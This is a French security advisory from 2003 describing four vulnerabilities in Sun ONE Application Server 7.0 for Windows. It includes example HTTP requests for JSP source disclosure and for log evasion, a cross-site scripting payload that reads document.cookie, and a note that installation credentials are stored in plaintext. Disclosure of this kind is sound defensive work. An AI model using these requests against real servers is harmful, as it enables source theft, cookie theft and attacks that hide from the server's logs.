Sun-One Application Server Multiple Vulnerabilities
|
Date de Publication: 2003-05-28
Titre: Sun-One Application Server Multiple Vulnerabilities
K-Otik ID : 0121
Exploitable à distance : Oui
Exploitable en local : Oui
* Description Technique - Exploit *
Plusieurs vulnérabilités critiques touchent Sun-ONE Application Server sous Windows. La première est de type "JSP source code disclosure" : un attaquant peut voir les codes sources d'une application JSP en changeant l'extension de .jsp en .JSP.
[Requête Normale]
GET /hello.jsp HTTP/1.0
[Réponse]
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)
<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
</body></html>
[Requête .JSP]
GET /hello.JSP HTTP/1.0
[Réponse]
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)
<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring
day.
</body></html>
La seconde faille est de type "Log evasion", elle permettrait à un attaquant de faire des requêtes qui ne seront pas logguées, puisque le serveur ne log que les 4042 premiers caractères d'une requête
[Requête /hello.jsp]
GET /AAAAAAAAAAAAAA[ plus de 4042 caractères]/../hello.jsp HTTP/1.0
[Le Fichier log] 172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /AAAAAAAAAA[plus de 4042 caractères] ...
La troisième faille de sécurité (moins grave) est de type Cross Site Scripting :
/webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script>
La dernière vulnérabilité quant à elle, est de type "plaintext passwords" : le nom d'utilisateur et le mot de passe sont stockés lors de l'installation dans le fichier "statefile" en texte clair.
* Versions Vulnérables *
Sun-ONE Application Server 7.0 pour Windows 2000/XP
* Solution *
Aucune solution officielle pour l'instant.
* Crédits *
Faille découverte par l'équipe de SPI Dynamics (Mai 2003).
|